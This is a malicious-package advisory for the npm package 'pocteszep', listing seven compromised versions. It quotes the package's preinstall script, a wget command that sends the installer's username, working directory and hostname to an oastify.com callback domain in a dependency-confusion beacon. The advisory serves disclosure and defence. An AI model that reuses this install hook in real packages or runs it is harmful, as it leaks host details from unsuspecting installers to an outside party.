VYPR

npm · Malicious package advisory

Malware

pocteszep

MAL-2026-5544

Malicious code in pocteszep (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (e13c609971d69e4699c85f451f163c7ab60ebb775171211fbd20d880b0ef2a2d)
The package's npm preinstall lifecycle script runs `wget --quiet "http://78dngdm3dhrrj8zgfm4es9m8bzhq5jt8.oastify.com/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)"` (package.json line 8). On `npm install`, before any code review, the installer's username, current working directory, and hostname are sent over plaintext HTTP to a Burp Collaborator (oastify.com) callback subdomain — a typical out-of-band exfiltration channel used in dependency-confusion attacks. The package description self-identifies as a 'Simple PoC package for testing for dependency confusion vulnerabilities,' and the package contains no legitimate functionality beyond the lifecycle beacon. Any installer pulling this package via name-collision with an internal dependency leaks host identity to the attacker.

## Source: ossf-package-analysis (1724503cde62bd3c17ba606fd752f088dfb2b1c41ae612ef5074f93e9896ee00)
The OpenSSF Package Analysis project identified 'pocteszep' @ 1.0.2 (npm) as malicious.

It is considered malicious because:

- The package communicates with a domain associated with malicious activity.

- The package executes one or more commands associated with malicious behavior.

Compromised versions (7)

  • 1.0.5
  • 1.0.1
  • 1.0.4
  • 1.0.0
  • 1.0.2
  • 1.1.1
  • 1.0.8

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.